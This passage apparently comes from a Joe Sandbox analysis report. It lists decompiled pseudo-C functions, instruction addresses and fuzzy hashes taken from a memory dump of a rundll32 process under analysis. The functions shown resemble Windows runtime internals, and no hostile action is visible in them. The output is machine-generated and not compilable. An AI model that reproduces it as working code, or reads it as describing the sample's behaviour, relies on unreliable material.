				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x44fd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04439ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0444B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E044D8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04439702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x44fb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                                0x04420055
                                                                                                                0x0442005d
                                                                                                                0x04420062
                                                                                                                0x0442006c
                                                                                                                0x0442006f
                                                                                                                0x04420074
                                                                                                                0x0442007a
                                                                                                                0x0442007a
                                                                                                                0x04420080
                                                                                                                0x04420080
                                                                                                                0x04420087
                                                                                                                0x0442008d
                                                                                                                0x0442008f
                                                                                                                0x04420093
                                                                                                                0x04420095
                                                                                                                0x0442009b
                                                                                                                0x044200f8
                                                                                                                0x044200fb
                                                                                                                0x044200fc
                                                                                                                0x044200ff
                                                                                                                0x04420108
                                                                                                                0x04420108
                                                                                                                0x044200a2
                                                                                                                0x044200a6
                                                                                                                0x044200b3
                                                                                                                0x044200bc
                                                                                                                0x044200c5
                                                                                                                0x044200ca
                                                                                                                0x0446c01e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446c02d
                                                                                                                0x044200d5
                                                                                                                0x044200d9
                                                                                                                0x0446c03d
                                                                                                                0x0446c046
                                                                                                                0x0446c046
                                                                                                                0x044200df
                                                                                                                0x044200e2
                                                                                                                0x044200ea
                                                                                                                0x044200ef
                                                                                                                0x044200f2
                                                                                                                0x044200f6
                                                                                                                0x04420111
                                                                                                                0x04420117
                                                                                                                0x04420117
                                                                                                                0x00000000
                                                                                                                0x044200f6
                                                                                                                0x044200d0
                                                                                                                0x044200d0
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12b3b6015aa95ec2565ffcac4d18e9e58964ab1bfa0e83298183c004f276f447
                                                                                                                • Instruction ID: f331938a77ded749e5254a4c0c6477006ed4559588e62a1af4067aaafe9927ca
                                                                                                                • Opcode Fuzzy Hash: 12b3b6015aa95ec2565ffcac4d18e9e58964ab1bfa0e83298183c004f276f447
                                                                                                                • Instruction Fuzzy Hash: C5317C31601A14CFEB21CF28D944B57B3E5FF88718F14456EE59687B90EB75B801CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04486C0A Relevance: .1, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E04486C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04427D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x44f7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04424620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0444F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04427D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04449AE0();
						_t23 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                                0x04486c0a
                                                                                                                0x04486c0f
                                                                                                                0x04486c10
                                                                                                                0x04486c13
                                                                                                                0x04486c15
                                                                                                                0x04486c19
                                                                                                                0x04486c1c
                                                                                                                0x04486c21
                                                                                                                0x04486c28
                                                                                                                0x04486c3a
                                                                                                                0x04486c2a
                                                                                                                0x04486c33
                                                                                                                0x04486c33
                                                                                                                0x04486c3f
                                                                                                                0x04486c48
                                                                                                                0x04486c4d
                                                                                                                0x04486c60
                                                                                                                0x04486c65
                                                                                                                0x04486c69
                                                                                                                0x04486c73
                                                                                                                0x04486c79
                                                                                                                0x04486c7f
                                                                                                                0x04486c86
                                                                                                                0x04486c90
                                                                                                                0x04486c94
                                                                                                                0x04486ca6
                                                                                                                0x04486cb2
                                                                                                                0x04486cbd
                                                                                                                0x04486cbd
                                                                                                                0x04486cc3
                                                                                                                0x04486cc7
                                                                                                                0x04486ccb
                                                                                                                0x04486cd0
                                                                                                                0x04486cd1
                                                                                                                0x04486ce2
                                                                                                                0x04486ce2
                                                                                                                0x04486c69
                                                                                                                0x04486ced

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c072fbb8ae9f5e0c9795ae21580e2371d432b858c35ce381d58ff48519897257
                                                                                                                • Instruction ID: 050537c8290525ee07fd78634550e5c153a51770cb2d7bb4bd29cb9ed7eb9902
                                                                                                                • Opcode Fuzzy Hash: c072fbb8ae9f5e0c9795ae21580e2371d432b858c35ce381d58ff48519897257
                                                                                                                • Instruction Fuzzy Hash: F4219CB1A00654AFEB15DF69D980F6AB7B8FF48744F14006AF904D7B92D638ED10CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044490AF Relevance: .1, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E044490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0445D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0443E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04424620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0444F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0443A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                                0x044490af
                                                                                                                0x044490b8
                                                                                                                0x044490bb
                                                                                                                0x044490bf
                                                                                                                0x044490c2
                                                                                                                0x044490c2
                                                                                                                0x044490c8
                                                                                                                0x044490cb
                                                                                                                0x044490cd
                                                                                                                0x044814d7
                                                                                                                0x044814eb
                                                                                                                0x044814eb
                                                                                                                0x00000000
                                                                                                                0x044814eb
                                                                                                                0x044814db
                                                                                                                0x044814e6
                                                                                                                0x00000000
                                                                                                                0x044814f2
                                                                                                                0x044814e8
                                                                                                                0x00000000
                                                                                                                0x044814e8
                                                                                                                0x044490d8
                                                                                                                0x044490da
                                                                                                                0x044490dd
                                                                                                                0x044490e5
                                                                                                                0x00000000
                                                                                                                0x04449139
                                                                                                                0x044490fa
                                                                                                                0x044490fe
                                                                                                                0x04449142
                                                                                                                0x00000000
                                                                                                                0x04449142
                                                                                                                0x04449104
                                                                                                                0x04449107
                                                                                                                0x0444910b
                                                                                                                0x04449110
                                                                                                                0x04449118
                                                                                                                0x04449147
                                                                                                                0x04449148
                                                                                                                0x0444914f
                                                                                                                0x04449150
                                                                                                                0x04449151
                                                                                                                0x04449152
                                                                                                                0x04449156
                                                                                                                0x0444915d
                                                                                                                0x04449160
                                                                                                                0x04449168
                                                                                                                0x0444916c
                                                                                                                0x044491bc
                                                                                                                0x044491be
                                                                                                                0x00000000
                                                                                                                0x044491be
                                                                                                                0x0444916e
                                                                                                                0x04449173
                                                                                                                0x04449176
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0444917c
                                                                                                                0x04449180
                                                                                                                0x044491b5
                                                                                                                0x00000000
                                                                                                                0x044491b5
                                                                                                                0x04449182
                                                                                                                0x04449185
                                                                                                                0x04449189
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0444918e
                                                                                                                0x04449190
                                                                                                                0x04449198
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044491a0
                                                                                                                0x00000000
                                                                                                                0x044491ad
                                                                                                                0x044491ad
                                                                                                                0x044491b0
                                                                                                                0x044491b1
                                                                                                                0x00000000
                                                                                                                0x04449185
                                                                                                                0x0444911a
                                                                                                                0x0444911c
                                                                                                                0x0444911f
                                                                                                                0x04449125
                                                                                                                0x04449127
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                • Instruction ID: 52d2573e3daf82d9b842bdfd03ee5bceb6ea21f7bd2a5cf5fb32da43e0250aa5
                                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                • Instruction Fuzzy Hash: C42171B1A00204EFFF30DF65C545A6BB7F8EB84714F14846BE98597211D630B9459B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04433B7A Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 59%
                                                                                                                			E04433B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x44f84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x44f84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x44f84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0444AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0444FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x44f84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x44f84c4; // 0x0
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                                0x04433b89
                                                                                                                0x04433b96
                                                                                                                0x04433ba1
                                                                                                                0x04433bab
                                                                                                                0x04433bb5
                                                                                                                0x04433bb9
                                                                                                                0x04476298
                                                                                                                0x04433bbf
                                                                                                                0x04433bc2
                                                                                                                0x04433bc3
                                                                                                                0x04433bc9
                                                                                                                0x04433bca
                                                                                                                0x04433bcc
                                                                                                                0x04433bcd
                                                                                                                0x04433bd4
                                                                                                                0x04433bd6
                                                                                                                0x04433bdb
                                                                                                                0x04433bea
                                                                                                                0x04433bf7
                                                                                                                0x04433bfb
                                                                                                                0x04433bff
                                                                                                                0x04433c09
                                                                                                                0x04433c0a
                                                                                                                0x04433c0b
                                                                                                                0x04433c0f
                                                                                                                0x04433c14
                                                                                                                0x04433c18
                                                                                                                0x04433c18
                                                                                                                0x04433bfb
                                                                                                                0x04433c1b
                                                                                                                0x04433c30
                                                                                                                0x04433c30
                                                                                                                0x04433c3d

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05b86b007b2b5c26cd0c2ca7e28b15746fbfe0514b57dcad74d9d960e24df6d5
                                                                                                                • Instruction ID: 86fde0eaa0a3144938494a9e9101b8e0557a97e61ee1c18f7e5f0cce03a4cfec
                                                                                                                • Opcode Fuzzy Hash: 05b86b007b2b5c26cd0c2ca7e28b15746fbfe0514b57dcad74d9d960e24df6d5
                                                                                                                • Instruction Fuzzy Hash: D621A172A00118AFEB10DF98CE81F5AB7BDFB44708F150169EA08AB252D775FD11CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04486CF0 Relevance: .1, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E04486CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04427D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04427D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x43e5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0443F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0443F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04487016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04422400( &_v52);
								}
								_t21 = L04422400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                                0x04486cfb
                                                                                                                0x04486d00
                                                                                                                0x04486d02
                                                                                                                0x04486d06
                                                                                                                0x04486d0a
                                                                                                                0x04486d0e
                                                                                                                0x04486d19
                                                                                                                0x04486d2b
                                                                                                                0x04486d1b
                                                                                                                0x04486d24
                                                                                                                0x04486d24
                                                                                                                0x04486d33
                                                                                                                0x04486d39
                                                                                                                0x04486d46
                                                                                                                0x04486d4f
                                                                                                                0x04486d61
                                                                                                                0x04486d51
                                                                                                                0x04486d5a
                                                                                                                0x04486d5a
                                                                                                                0x04486d69
                                                                                                                0x04486d6b
                                                                                                                0x04486d6d
                                                                                                                0x04486d6f
                                                                                                                0x04486d6f
                                                                                                                0x04486d74
                                                                                                                0x04486d79
                                                                                                                0x04486d7a
                                                                                                                0x04486d7f
                                                                                                                0x04486d82
                                                                                                                0x04486d88
                                                                                                                0x04486d89
                                                                                                                0x04486d90
                                                                                                                0x04486d94
                                                                                                                0x04486da7
                                                                                                                0x04486db1
                                                                                                                0x04486db1
                                                                                                                0x04486dbb
                                                                                                                0x04486dbb
                                                                                                                0x04486d90
                                                                                                                0x04486d69
                                                                                                                0x04486d46
                                                                                                                0x04486dc6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e5f09b6e6e8dd167d934ba8ce2993b16abd98bc705c529948a81fc10178b2b00
                                                                                                                • Instruction ID: 6b8e92447d29b695d7a6671fe78a48693daf562b90660543499e12ebe8754f87
                                                                                                                • Opcode Fuzzy Hash: e5f09b6e6e8dd167d934ba8ce2993b16abd98bc705c529948a81fc10178b2b00
                                                                                                                • Instruction Fuzzy Hash: 8B21D0725006449BDB21EF6ACA44B6FB7ECAF81744F05045FB94087362E734FA09C6A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D070D Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E044D070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E044D07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E044CAFDE( &_v8,  &_v12);
					E044D1293(_t38, _v28, _t60);
					if(E04427D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E044C14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                                0x044d071b
                                                                                                                0x044d0724
                                                                                                                0x044d0734
                                                                                                                0x044d0738
                                                                                                                0x044d074b
                                                                                                                0x044d074b
                                                                                                                0x044d0753
                                                                                                                0x044d0753
                                                                                                                0x044d0759
                                                                                                                0x044d075d
                                                                                                                0x044d0774
                                                                                                                0x044d0779
                                                                                                                0x044d077d
                                                                                                                0x044d0789
                                                                                                                0x044d0795
                                                                                                                0x044d07a7
                                                                                                                0x044d0797
                                                                                                                0x044d07a0
                                                                                                                0x044d07a0
                                                                                                                0x044d07af
                                                                                                                0x044d07c4
                                                                                                                0x044d07cd
                                                                                                                0x044d07cd
                                                                                                                0x044d07af
                                                                                                                0x044d07dc

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                • Instruction ID: 5330d2fe456682673f0923c3e133afcd4da43c9812eb1b630f9727f8dcfe96b3
                                                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                • Instruction Fuzzy Hash: B92104362042049FDB15DF18C890B6BBBA5EFC4354F04856EF9959F382D730E909CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0442AE73 Relevance: .1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E0442AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04427D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04427D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04427D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04427D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04487794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                                0x0442ae78
                                                                                                                0x0442ae7c
                                                                                                                0x0442ae7e
                                                                                                                0x0442ae81
                                                                                                                0x0442ae86
                                                                                                                0x0442ae8d
                                                                                                                0x04472691
                                                                                                                0x0442ae93
                                                                                                                0x0442ae93
                                                                                                                0x0442ae93
                                                                                                                0x0442ae98
                                                                                                                0x0442ae9d
                                                                                                                0x044726a2
                                                                                                                0x044726b4
                                                                                                                0x044726a4
                                                                                                                0x044726ad
                                                                                                                0x044726ad
                                                                                                                0x044726b9
                                                                                                                0x00000000
                                                                                                                0x044726bb
                                                                                                                0x00000000
                                                                                                                0x044726bb
                                                                                                                0x0442aea3
                                                                                                                0x0442aea3
                                                                                                                0x0442aea3
                                                                                                                0x0442aeaa
                                                                                                                0x044726c0
                                                                                                                0x044726c9
                                                                                                                0x044726c9
                                                                                                                0x0442aeb3
                                                                                                                0x044726d4
                                                                                                                0x044726e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044726e7
                                                                                                                0x044726ee
                                                                                                                0x044726f0
                                                                                                                0x044726f9
                                                                                                                0x044726f9
                                                                                                                0x04472702
                                                                                                                0x04472708
                                                                                                                0x04472708
                                                                                                                0x0447270b
                                                                                                                0x0447270f
                                                                                                                0x04472711
                                                                                                                0x04472711
                                                                                                                0x04472725
                                                                                                                0x04472725
                                                                                                                0x00000000
                                                                                                                0x0442aeb9
                                                                                                                0x0442aeb9
                                                                                                                0x0442aebf
                                                                                                                0x0442aebf
                                                                                                                0x0442aeb3

                                                                                                                Memory Dump Source
